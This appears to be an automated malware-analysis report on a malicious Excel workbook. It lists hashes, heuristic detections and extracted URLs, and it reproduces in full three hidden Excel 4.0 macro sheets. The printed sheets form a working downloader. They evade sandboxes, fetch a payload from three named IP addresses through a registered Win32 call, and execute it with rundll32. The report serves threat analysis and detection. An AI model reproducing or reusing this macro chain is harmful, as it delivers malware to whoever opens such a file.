Office (OOXML) malware analysis — malicious · fe86c3ace5a9c74b

MALICIOUS

Office (OOXML)

211.1 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-10

MD5: eb323ecc66e6079460200923fb55f351 SHA-1: 138e7b0efeaca17df4d3b0b94fd3bddbcdcaef1d SHA-256: fe86c3ace5a9c74be1c1f5365fc0ac0c908cce220f72fc95e68d54fd1b021990

150 Risk Score

Heuristics 5

Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Dangerous XLM formula APIs: FORMULA, GOTO, HALT, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://51.89.115.121/ Referenced by macro
- http://185.141.27.144/Referenced by macro
- http://51.89.115.121/44313,6048108796.datReferenced by macro
- http://194.67.203.54/44313,6048108796.datReferenced by macro
- http://185.141.27.144/44313,6048108796.datReferenced by macro
- http://194.67.203.54/Referenced by macro
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	4300 bytes
SHA-256: `66c9666ae62b3c78a9d85fb9c746e3b8979fe901ea6881a6402b1367c4f0fbc1`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}"><dimension ref="AG57:AN77"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="21" style="2" customWidth="1"/><col min="2" max="2" width="14.28515625" style="2" customWidth="1"/><col min="3" max="31" width="9.140625" style="2"/><col min="32" max="32" width="9.140625" style="2" customWidth="1"/><col min="33" max="34" width="9.140625" style="2" hidden="1" customWidth="1"/><col min="35" max="35" width="17.5703125" style="2" hidden="1" customWidth="1"/><col min="36" max="38" width="9.140625" style="2" hidden="1" customWidth="1"/><col min="39" max="39" width="11.7109375" style="2" hidden="1" customWidth="1"/><col min="40" max="40" width="9.140625" style="2" hidden="1" customWidth="1"/><col min="41" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="57" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ57" s="2"><v>1</v></c></row><row r="58" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ58" s="2"><v>9</v></c></row><row r="60" spans="34:39" x14ac:dyDescent="0.25"><c r="AI60" s="2"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="61" spans="34:39" x14ac:dyDescent="0.25"><c r="AI61" s="2" t="b"><f>FORMULA(AH73&AH74&AH75,AJ65)</f><v>0</v></c></row><row r="62" spans="34:39" x14ac:dyDescent="0.25"><c r="AH62" s="2" t="str"><f>CONCATENATE(AH68,AI60,AH66,AH67)</f><v>http://51.89.115.121/44313,6048108796.dat</v></c><c r="AM62" s="2" t="e"><f>IF(GET.WORKSPACE(42),,CLOSE(1))</f><v>#N/A</v></c></row><row r="63" spans="34:39" x14ac:dyDescent="0.25"><c r="AH63" s="2" t="str"><f>CONCATENATE(AH69,AI60,AH66,AH67)</f><v>http://194.67.203.54/44313,6048108796.dat</v></c></row><row r="64" spans="34:39" x14ac:dyDescent="0.25"><c r="AH64" s="2" t="str"><f>CONCATENATE(AH70,AI60,AH66,AH67)</f><v>http://185.141.27.144/44313,6048108796.dat</v></c><c r="AJ64" s="2" t="s"><v>3</v></c></row><row r="66" spans="34:39" x14ac:dyDescent="0.25"><c r="AH66" s="2" t="s"><v>0</v></c><c r="AJ66" s="2" t="s"><v>4</v></c></row><row r="67" spans="34:39" x14ac:dyDescent="0.25"><c r="AH67" s="2" t="s"><v>1</v></c><c r="AJ67" s="2" t="s"><v>5</v></c><c r="AM67" s="2" t="e"><f>IF(GET.WORKSPACE(19),,CLOSE(1))</f><v>#N/A</v></c></row><row r="68" spans="34:39" x14ac:dyDescent="0.25"><c r="AH68" s="2" t="s"><v>9</v></c><c r="AM68" s="2" t="e"><f>GET.WORKSPACE(26)</f><v>#N/A</v></c></row><row r="69" spans="34:39" x14ac:dyDescent="0.25"><c r="AH69" s="2" t="str"><f>"http://194.67.203.54/"</f><v>http://194.67.203.54/</v></c><c r="AI69" s="2" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c><c r="AM69" s="2" t="b"><f>IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),ON.TIME(NOW()+"00:00:02","Milolos"),CLOSE(1))</f><v>0</v></c></row><row r="70" spans="34:39" x14ac:dyDescent="0.25"><c r="AH70" s="2" t="s"><v>10</v></c><c r="AJ70" s="2" t="s"><v>8</v></c></row><row r="72" spans="34:39" x14ac:dyDescent="0.25"><c r="AM72" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="73" spans="34:39" x14ac:dyDescent="0.25"><c r="AH73" s="2" t="s"><v>2</v></c></row><row r="74" spans="34:39" x14ac:dyDescent="0.25"><c r="AH74" s="2" t="s"><v>7</v></c></row><row r="75" spans="34:39" x14ac:dyDescent="0.25"><c r="AH75" s="2" t="s"><v>6</v></c></row><row r="77" spans="34:39" x14ac:dyDescent="0.25"><c r="AI77" s="2" t="b"><f>GOTO(Jioka!H15)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	2097 bytes
SHA-256: `0a66b50328ea57abfd0fba95f93001e89e484283026f92736f861e28fb7eaa14`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="12.140625" style="2" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>REGISTER(Kost!AJ64,Kost!AJ65,Kost!AJ66,Kost!AJ67,,Kost!AJ57,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="2" t="e"><f>Belandes(0,Kost!AH62,Kost!AJ70,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="2" t="e"><f>IF(G12<0, Belandes(0,Kost!AH63,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="2" t="e"><f>IF(G13<0, Belandes(0,Kost!AH64,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="2"><f>IF(G14<0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(Kost!AI74)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet3.xml	1832 bytes
SHA-256: `5e80fd069ac35c5e39918d8dfaaf0ba77875f57b487bcfcc5d8bc7d346806551`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}"><dimension ref="H9:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="2"/><col min="8" max="8" width="9.85546875" style="2" customWidth="1"/><col min="9" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="str"><f>"rundll32 ..\Butyo.vikas"</f><v>rundll32 ..\Butyo.vikas</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="2" t="str"><f>",DllRegisterServer"</f><v>,DllRegisterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="2" t="b"><f>EXEC(I9&I10)</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="2" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.